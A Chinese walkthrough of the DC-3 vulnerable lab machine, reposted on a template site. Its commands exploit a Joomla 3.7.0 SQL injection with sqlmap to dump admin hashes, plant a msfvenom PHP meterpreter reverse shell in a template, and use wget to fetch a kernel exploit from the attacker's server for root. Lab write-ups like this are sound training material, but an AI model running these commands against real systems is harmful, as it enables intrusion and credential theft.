DC3详解

这篇具有很好参考价值的文章主要介绍了DC3详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

DC-3靶机

1.确定靶机IP

arp-scan -l

masscan --rate=10000 -p 1-65535 192.168.220.133

nmap -p80 -sV -A -T4 192.168.220.133

{

2.收集信息

根据nmap的扫描结果可以发现其CMS为joomla,采用joomla扫描器joomscan进行扫描

joomscan -u http://192.168.220.133

发现登录页面http://192.168.220.133/administrator/

发现joomla版本为3.7.0

查找相关漏洞

{

 searchsploit joomla 3.7.0

查找joomla 3.7.0存在的漏洞

{

 查看漏洞利用文章

searchsploit -p 42033.txt

{

 将txt文件复制到dc3目录(当前目录)下

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt ./

{

3.sqlmap利用

提示用sqlmap进行遍历数据库

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将其中的localhost改为靶机的IP 192.168.220.133

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

{

 读取到五个数据库,注意到有一个joomla的数据库

采用sqlmap来遍历数据库joomladb中的表名,发现#__users表,遍历其中的内容

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

{

 sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

发现username和password两个列名

{

 查看其中的内容

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

发现admin账户和其密码的hash值

{

 创建一个txt文件,将admin密码的hash值放入其中

touch 1.txt

vi 1.txt

采用john来解密hash值,得到密码为snoopy

{

登录admin账户密码snoopy

{ 在模板中发现能够上传文件,尝试上传木马文件连接靶机

{

 4.文件上传

创建一个php木马上传

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.220.133 lport=4444 -f raw -o hack.php

生成一个php后门文件,将生成的后门文件放入网页templates(模板)中创建一个php文件

{

 文章来源地址https://www.toymoban.com/news/detail-646635.html

{

 {

 后门创建好后,打开msf进行木马利用

{

 use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.220.133

{

 exploit  //利用

{

 网站访问木马文件

192.168.220.133/templates/beez3/hack.php

{

 返回kali查看,此时已经获取到权限

{

 建立一个交互式shell

先输入shell

再输入python语法,建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

{

 searchsploit Ubuntu

searchsploit -p 39772.txt

然后建立网站目录

python -m SimpleHTTPServer 8888

PS:查看自身端口开放情况

wget http://192.168.220.129:8888/39772.zip

{

 unzip 39772.zip

{

 tar xf exploit.tar

进入39772文件夹下,然后打开exploit.tar文件

cd ebpf_mapfd_doubleput_exploit

进入ebpf_mapfd_doubleput_exploit目录下

./compile.sh

执行程序

{

 ./doubleput

执行程序doubleput

得到root权限,查看家目录,拿到最终的flag。

{

谢谢观看 !

 

到了这里,关于DC3详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • IoT DC3 是一个基于 Spring Cloud 的开源的、分布式的物联网(IoT)平台本地部署步骤

    ​​ 必要软件环境 进入原网页# 务必保证至少需要给 docker 分配:1 核 CPU 以及 4G 以上的运行内存! JDK : 推荐使用 Oracle JDK 1.8 或者 OpenJDK8 ,理论来说其他版本也行; Maven : 推荐使用 Maven 3.8 ,理论来说其他版本也行; IDE : IntelliJ IDEA 或者 Eclipse ,理论来说其他 Java IDE 也行;

    2024年02月11日
    浏览(50)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(39)
  • DC-1靶机渗透(教程以及思路)

    一:信息搜集 首先第一步就是使用fping来查看靶机的ip 使用命令fping -aqg ip 使用nmap -sS -p-进行扫描 发现开启了4个端口,分别是22,80,111,45186 再使用nmap的-sV扫描详细信息进行扫描,查看版本号判断是否存在漏洞 二:思路 一般来说这样的端口,我会先从80端口开始,看是否存

    2023年04月08日
    浏览(41)
  • DC-7靶机做题记录

    靶机下载地址: 参考: DC7靶机地址:http://www.five86.com/downloads/DC-7.zip DC7靶场介绍: https://www.vulnhub.com/entry/dc-7,356/ php插件地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz 【DC系列靶机DC7通关讲解】 https://www.bilibili.com/video/BV1f8411T7As/?share_source=copy_webvd_source=12088c39299ad03109d9a

    2024年01月22日
    浏览(36)
  • DC-6靶机做题记录

    靶机下载地址: 参考: DC6靶场介绍:https://www.vulnhub.com/entry/dc-6,315/ 靶机:http://www.five86.com/downloads/DC-6.zip DC-6 (1).pdf https://wpscan.com/ 【网安神器篇】——WPScan漏洞扫描工具-CSDN博客 ChatGPT 【DC系列靶机DC6通关讲解】 https://www.bilibili.com/video/BV1eA411U7ox/?share_source=copy_webvd_source=12088c

    2024年01月23日
    浏览(40)
  • DC-5靶机做题记录

    靶机下载地址: 参考: DC5官方地址:https://www.vulnhub.com/entry/dc-5,314/ DC5靶机地址:https://download.vulnhub.com/dc/DC-5.zip DC-5 (1).pdf 【DC系列靶机DC5通关讲解】 https://www.bilibili.com/video/BV1Bj411N74r/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef ChatGPT 描述: 1、导入VMware虚拟机 2、拍摄快

    2024年01月22日
    浏览(41)
  • DC-4靶机刷题记录

    靶机下载地址: 参考: 【【基础向】超详解vulnhub靶场DC-4-爆破+反弹shell+信息收集】 https://www.bilibili.com/video/BV1Le4y1o7Sx/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef http://t.yssmx.com/BOGVr http://t.yssmx.com/tRrgh DC-4 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti-dc-4 https://www.vulnhub.com/entr

    2024年01月20日
    浏览(35)
  • DC-3靶机刷题记录

    靶机下载地址: 参考: https://www.vulnhub.com/entry/dc-32,312/ 官网 DC-3 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti—dc-3 【【基础向】超详解vulnhub靶场DC-3-一靶多打】 https://www.bilibili.com/video/BV11a411d78T/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef ChatGPT 当出现DE 设备 (磁盘/CD-ROM)配置不

    2024年01月20日
    浏览(41)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(31)
  • DC-9通关详解

    result.php 处存在sql注入 sqlmap跑信息 python sqlmap.py -u http://192.168.45.146/results.php --data search=1 -D users -T UserDetails --dump 拿了几个尝试登录都无效 ssh尝试登录直接拒绝了 再看Staff表 查哈希 进后台 多了一个添加记录的功能 没啥用,不能–os-shell 发现一个细节 猜测是文件包含 猜传的值

    2024年02月04日
    浏览(16)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包